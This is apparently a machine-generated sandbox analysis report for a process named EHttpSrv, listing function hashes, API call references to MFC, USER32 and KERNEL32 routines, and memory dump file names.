• Opcode ID: 202ddafeb765ee368af551cb43395fe2e284931c58a5d4b635247606cee89bb1
• Instruction ID: d74fc9ed131b597ec5b893aaa673d03ed43e5dc2af2b337a9e3f9e09efffe5ec
• Opcode Fuzzy Hash: 202ddafeb765ee368af551cb43395fe2e284931c58a5d4b635247606cee89bb1
• Instruction Fuzzy Hash: 906194B2500204CBCB08DF69C88199AB7E7FF94640B55C979ED09AB355D739FE49CB80
APIs
• #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041110A
• #764.MFC80U(20462D01,?,?,?,204127C5,?,20462D02), ref: 2041111A
• #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041112A
• #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041113A
• #265.MFC80U(00000000,?,?,?,204127C5,?,20462D02), ref: 20411183
• #265.MFC80U(00000000,?,?,?,204127C5,?,20462D02), ref: 204111E3
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #764$#265
• String ID:
• API String ID: 4171483331-0
• Opcode ID: b0024c4ae3a6811a114333c3da070cb76984e76ce6f3e22c897bc08ae9efce5c
• Instruction ID: f85ed80b83d1636cf1b4d5d20a0cd95768f1b4f61d958747549d995c4f053705
• Opcode Fuzzy Hash: b0024c4ae3a6811a114333c3da070cb76984e76ce6f3e22c897bc08ae9efce5c
• Instruction Fuzzy Hash: 8E51A1726002019BCB18CF64C8527ABB7A2EF88744F59C568ED06DF795E639EE41C7C0
APIs
• #314.MFC80U(00000000,FEEA6C22), ref: 2044DC28
• #6751.MFC80U(00000000,?), ref: 2044DC5D
• #6751.MFC80U(00000000,?), ref: 2044DCA3
• #6751.MFC80U(00000000,?), ref: 2044DCF6
• #4026.MFC80U(00000280,00000000,FEEA6C22), ref: 2044DD53
• #4026.MFC80U(00000281), ref: 2044DD7A
  • Part of subcall function 2042E670: #6751.MFC80U(00000000,?,2042E5B8,00000000,FEEA6C22), ref: 2042E688
• #6751.MFC80U(00000000,?), ref: 2044DDCD
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: #6751$#4026$#314
• String ID:
• API String ID: 2838678766-0
• Opcode ID: 692cc9bb21db07b68e7811fb851dabe5d5df92b517cd9293be954f60f0aa44a1
• Instruction ID: 98200cb8d907bf1af1504b7ffa4f8b20505593ed0345a61892d829ef86b1c792
• Opcode Fuzzy Hash: 692cc9bb21db07b68e7811fb851dabe5d5df92b517cd9293be954f60f0aa44a1
• Instruction Fuzzy Hash: EA518DB2A083019FD304CF58D881A6AB7E1FBD4620F10CA2EF99587790DB39D805CB51
APIs
• SendMessageW.USER32(?,00001061,00000000,?), ref: 20420B60
• #2788.MFC80U(?,?,00000000), ref: 20420B74
• SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20420B8C
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 20420BAD
• SendMessageW.USER32 ref: 20420BFE
• #762.MFC80U(00000040), ref: 20420C0A
• #764.MFC80U(?), ref: 20420C6B
• #764.MFC80U(?), ref: 20420C84
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
Similarity
• API ID: MessageSend$#764$#2788#762
• String ID:
• API String ID: 94826352-0
• Opcode ID: 303d5266d76560b70a859dddbe5445c77b7a3256dd36d6156f144aae68344a2a
• Instruction ID: cccce94efbb18c0b116a899b718fa4962595c2b7fd6ca270cb1dbf47a7686ba6
• Opcode Fuzzy Hash: 303d5266d76560b70a859dddbe5445c77b7a3256dd36d6156f144aae68344a2a
• Instruction Fuzzy Hash: 985106B19087449FD320CF5AC8C0A5BFBE4BB58654F908A2EF59987750D334E844CF56
APIs
• #764.MFC80U(?,?,?,20420B95,?,?,00000000), ref: 2040FBB7
Memory Dump Source
• Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
• Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 80f0db05304fd9d6823bb3fdc5d65254f79319c78f0f45daf2988447773be1fe
                                                                                                                • Instruction ID: 2667b74741966b4bc6b088ac4c1c2f5677e93d82a42779522c08319c34846e7a
                                                                                                                • Opcode Fuzzy Hash: 80f0db05304fd9d6823bb3fdc5d65254f79319c78f0f45daf2988447773be1fe
                                                                                                                • Instruction Fuzzy Hash: 0141D5F16047088BD3289FA5CC82B2AB3E6EB80614F54C93DE55AD7E50EA3DF8458B50
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,20431F52), ref: 20434A67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 54fc8e52c9ad11d0352c6890a50526739e071df378e0acc8d1de1216e089caed
                                                                                                                • Instruction ID: 8d2cc59dc8edb40c4a55f40b973c5f82235228e467e1daf06889393d0d2ee4c8
                                                                                                                • Opcode Fuzzy Hash: 54fc8e52c9ad11d0352c6890a50526739e071df378e0acc8d1de1216e089caed
                                                                                                                • Instruction Fuzzy Hash: 5B31D3B26007045BD3249FA5D985B5BF7EAEBD4A14FB4D83EE05AC7A90D63CF8418B10
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,20452885), ref: 20452DE7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: d9fe5cdd2b2663bd7e67fa88f134ce0ceda9424471f8b88cf63c91e175b127f5
                                                                                                                • Instruction ID: ea582bc9380f3ed550f0ddff936b639677b4f6806d39c03b11275879b4d4be38
                                                                                                                • Opcode Fuzzy Hash: d9fe5cdd2b2663bd7e67fa88f134ce0ceda9424471f8b88cf63c91e175b127f5
                                                                                                                • Instruction Fuzzy Hash: 4A31CBF26007045BD3149F55CA82A1BBBE6EBE1614F50C83FE55AD7A50D63CF8468710
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042D850: #524.MFC80U(00000000,00000000,00000000,FEEA6C22,?,2047ED3A,20479C16,000000FF,204263A6,?,000000B8,FEEA6C22,?,?,?), ref: 2042D87F
                                                                                                                  • Part of subcall function 2042D850: #563.MFC80U(00000000,00000000,00000000,FEEA6C22,?,2047ED3A,20479C16,000000FF,204263A6,?,000000B8,FEEA6C22,?,?,?), ref: 2042D898
                                                                                                                  • Part of subcall function 20429FA0: #516.MFC80U(0000009A,00000000,00000038,FEEA6C22,?,00000000,20479F3C,000000FF,204263BE,?,?,000000B8,FEEA6C22,?,?,?), ref: 20429FD0
                                                                                                                  • Part of subcall function 2042A990: #516.MFC80U(00000098,00000000,00000038,FEEA6C22,?,00000000,20479EBD,000000FF,204263CF,?,?,?,000000B8,FEEA6C22,?), ref: 2042A9C0
                                                                                                                  • Part of subcall function 2042A990: #6735.MFC80U(20485878,2047EF1E,2047EECA,2047EE76,2047EE22), ref: 2042AA3D
                                                                                                                  • Part of subcall function 20427410: #516.MFC80U(00000099,00000000,00000038,FEEA6C22,?,00000000,?,2047B309,000000FF,204263E0,?,?,?,?,000000B8,FEEA6C22), ref: 20427442
                                                                                                                • #416.MFC80U(?,?,?,?,000000B8,FEEA6C22,?,?,?), ref: 20426431
                                                                                                                • #762.MFC80U(00000120,?,?,?,?,000000B8,FEEA6C22,?,?,?), ref: 20426474
                                                                                                                • #977.MFC80U(?), ref: 204264C2
                                                                                                                • #977.MFC80U(?,?), ref: 204264CA
                                                                                                                • #977.MFC80U(?,?,?), ref: 204264D8
                                                                                                                • #1555.MFC80U(00000010,00000010,000000FE,00000000,00000004,?,?,?), ref: 20426507
                                                                                                                • GetSysColor.USER32(00000005), ref: 2042650E
                                                                                                                • #1079.MFC80U(?,00000000), ref: 2042651C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #516#977$#1079#1555#416#524#563#6735#762Color
                                                                                                                • String ID:
                                                                                                                • API String ID: 982528815-0
                                                                                                                • Opcode ID: 5648d2ac7418de48b8c5000bd49b746fe147b288bb7b03ceb556e51628c86201
                                                                                                                • Instruction ID: 583975d9903fe4becb5d36a3077c42142cba33229de1660348c340dbb429fb34
                                                                                                                • Opcode Fuzzy Hash: 5648d2ac7418de48b8c5000bd49b746fe147b288bb7b03ceb556e51628c86201
                                                                                                                • Instruction Fuzzy Hash: BD516F70504B808FD321CF64D881BDBBBE4BF99748F408A1EF0DA97290D778A504CB66
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2044A055
                                                                                                                • #764.MFC80U(?), ref: 2044A0A2
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2044A0AF
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2044A0EE
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000022,00000100,?), ref: 2044A11E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 2044A13B
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2044A16D
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2044A194
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave$#764ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 3041980425-0
                                                                                                                • Opcode ID: 03b9c78566b1dd80389c3f2b36833bf0a1bea24ae9f6d7108f501abc60001dba
                                                                                                                • Instruction ID: 82b977572f22e7b8bb91f181182a35f75dbe438bf220df568fdc3ecb4b1e28b1
                                                                                                                • Opcode Fuzzy Hash: 03b9c78566b1dd80389c3f2b36833bf0a1bea24ae9f6d7108f501abc60001dba
                                                                                                                • Instruction Fuzzy Hash: F651F3715187409FD750CFA8C888B9BBBF8BF89B05F40892EF599C7250E7B4A904CB52
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,00000000,?,20416D18,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 20418A37
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 4671958f0ad303c47a6cea02f2b3ca069dbd3f82c4566170932d8e23fa0049ef
                                                                                                                • Instruction ID: b5e178df7553e5923ded9b5b8ce6b07c4099fafa75c94dcfe441f56e0ece09ee
                                                                                                                • Opcode Fuzzy Hash: 4671958f0ad303c47a6cea02f2b3ca069dbd3f82c4566170932d8e23fa0049ef
                                                                                                                • Instruction Fuzzy Hash: 1431A2F16007089BC7249FA5CC81A2BF7E5EF90654B54C92EE15AC7E51EB3DF8858B10
                                                                                                                APIs
                                                                                                                • #1079.MFC80U(?,?,?,00000000,FEEA6C22), ref: 20455C4D
                                                                                                                  • Part of subcall function 20435260: #1079.MFC80U(?,FEEA6C22), ref: 2043529B
                                                                                                                  • Part of subcall function 20435260: #6749.MFC80U(?,?,FEEA6C22), ref: 204352A7
                                                                                                                • #1079.MFC80U(?,-00000001,?,?,00000000,FEEA6C22), ref: 20455C70
                                                                                                                  • Part of subcall function 20438C80: #1079.MFC80U(?,FEEA6C22), ref: 20438CBB
                                                                                                                  • Part of subcall function 20438C80: #6749.MFC80U(?,?,FEEA6C22), ref: 20438CC7
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 20455CF0
                                                                                                                • #1079.MFC80U(?,000000FF,?,?,?,00000000,FEEA6C22), ref: 20455D08
                                                                                                                • DestroyCursor.USER32(?), ref: 20455D21
                                                                                                                • #3873.MFC80U(00000003,?,?,00000000,00000000,00000000,00000000,?,?,00000000,FEEA6C22), ref: 20455D53
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,00000000,00000003,?,?,00000000,00000000,00000000,00000000), ref: 20455D71
                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFF), ref: 20455DA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079$#6749$#3873#5862CursorDestroyExtractIconMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3740703228-0
                                                                                                                • Opcode ID: bc88314e8a2c7bb4b1c66cc2310b991db2a563fcf2a6d5de5453a8f766692c92
                                                                                                                • Instruction ID: ca98d3bb5e91f5b46d3c0e92cc0e6e070d20d5571afe716a276512f36404c08b
                                                                                                                • Opcode Fuzzy Hash: bc88314e8a2c7bb4b1c66cc2310b991db2a563fcf2a6d5de5453a8f766692c92
                                                                                                                • Instruction Fuzzy Hash: 1041BE72204700AFD220CFA8CC85FAA77F6ABD4B18F51C91CF6554B291DB78B9098B91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                 • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                 • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2311$#314#6063#6232#6751#777_time32
                                                                                                                • String ID:
                                                                                                                • API String ID: 2375346300-0
                                                                                                                • Opcode ID: 47ccfba3e1fb941079224ed5e546ca3a6837c2b87bdf42400c5254aeb6c8b629
                                                                                                                • Instruction ID: 047fd8ab0e14bad808cae18b8e573b341801a1b2de1a36cfe5e680196c8a5cba
                                                                                                                • Opcode Fuzzy Hash: 47ccfba3e1fb941079224ed5e546ca3a6837c2b87bdf42400c5254aeb6c8b629
                                                                                                                • Instruction Fuzzy Hash: 4941D5712082018BD714CF64CC85BAA7BA5BB94708F04C93DFD49AF6D5DB78A909CB92
                                                                                                                APIs
                                                                                                                • free.MSVCR80 ref: 2043C71E
                                                                                                                • malloc.MSVCR80 ref: 2043C74B
                                                                                                                • free.MSVCR80 ref: 2043C781
                                                                                                                • memcpy.MSVCR80(?,00000000,00000000,-00000023,?,00000000,?,2043F10A,?,?,?,?,?,00000001,00000000), ref: 2043C7AA
                                                                                                                • free.MSVCR80 ref: 2043C7B3
                                                                                                                • free.MSVCR80 ref: 2043C7C2
                                                                                                                • RegCloseKey.ADVAPI32(?,-00000023,?,00000000,?,2043F10A,?,?,?,?,?,00000001,00000000), ref: 2043C7D6
                                                                                                                • free.MSVCR80 ref: 2043C7DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free$Closemallocmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3581950131-0
                                                                                                                • Opcode ID: f0c7fdecfce2c502539653a6f82cc0022d8f8dea81b92cbdaf8e2dada8b9ab0a
                                                                                                                • Instruction ID: e8fc556353d8257b0342223d7edd590952b23e1f51f59bb0600cbce124897fe4
                                                                                                                • Opcode Fuzzy Hash: f0c7fdecfce2c502539653a6f82cc0022d8f8dea81b92cbdaf8e2dada8b9ab0a
                                                                                                                • Instruction Fuzzy Hash: CB318EB26006035BD6009FA49C85A67B7ACFF09621F149539ED05D3700EB2DFE98DBE2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#2366#4109#5609#5713ClientParentWindowmalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3311746519-0
                                                                                                                • Opcode ID: 713f1deccbfcd25f1fbb48848ab7b5f8e3d11472b31d5a077c9c2f4c7b21a063
                                                                                                                • Instruction ID: e0f211835fd23e83626e035faf1916a20849807f104068c9a12278701ed8cba4
                                                                                                                • Opcode Fuzzy Hash: 713f1deccbfcd25f1fbb48848ab7b5f8e3d11472b31d5a077c9c2f4c7b21a063
                                                                                                                • Instruction Fuzzy Hash: BE3129B06087019FC318CF58C884A6ABBF5BF98704F01CA6DE88A87361DB34E945CB55
                                                                                                                APIs
                                                                                                                • DestroyAcceleratorTable.USER32(?), ref: 2046C76E
                                                                                                                  • Part of subcall function 20431180: DestroyCursor.USER32(?), ref: 204311C1
                                                                                                                  • Part of subcall function 20431180: #764.MFC80U(?,?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431225
                                                                                                                  • Part of subcall function 20431180: #745.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431235
                                                                                                                  • Part of subcall function 20431180: #578.MFC80U(?,?,?,?,FEEA6C22,?,?,00000000,2047CC2F,000000FF,20472809), ref: 20431242
                                                                                                                  • Part of subcall function 20431180: #745.MFC80U ref: 20431250
                                                                                                                  • Part of subcall function 20431180: #578.MFC80U ref: 2043125D
                                                                                                                  • Part of subcall function 20431180: #741.MFC80U ref: 2043126D
                                                                                                                  • Part of subcall function 20421E10: #658.MFC80U(FEEA6C22,?,?,00000000,2047A0D3,000000FF,2046C7A4), ref: 20421E58
                                                                                                                • #587.MFC80U ref: 2046C7AF
                                                                                                                • #587.MFC80U ref: 2046C7BF
                                                                                                                • #753.MFC80U ref: 2046C7CF
                                                                                                                • #753.MFC80U ref: 2046C7DF
                                                                                                                • #587.MFC80U ref: 2046C7EF
                                                                                                                  • Part of subcall function 2045D000: free.MSVCR80 ref: 2045D058
                                                                                                                  • Part of subcall function 2045D000: #6003.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D06E
                                                                                                                  • Part of subcall function 2045D000: #722.MFC80U(00000000,000000FF,FEEA6C22,?,?,?,?,00000000,204798FB,000000FF,2045D691,?,?,?,00000000,2047A52C), ref: 2045D07D
                                                                                                                  • Part of subcall function 20470490: #578.MFC80U(FEEA6C22,?,?,00000000,2047A279,000000FF,2046C814), ref: 204704D7
                                                                                                                  • Part of subcall function 20470490: #764.MFC80U(00000000,FEEA6C22,?,?,00000000,2047A279,000000FF,2046C814), ref: 204704E9
                                                                                                                • #651.MFC80U ref: 2046C81F
                                                                                                                • #605.MFC80U ref: 2046C82E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
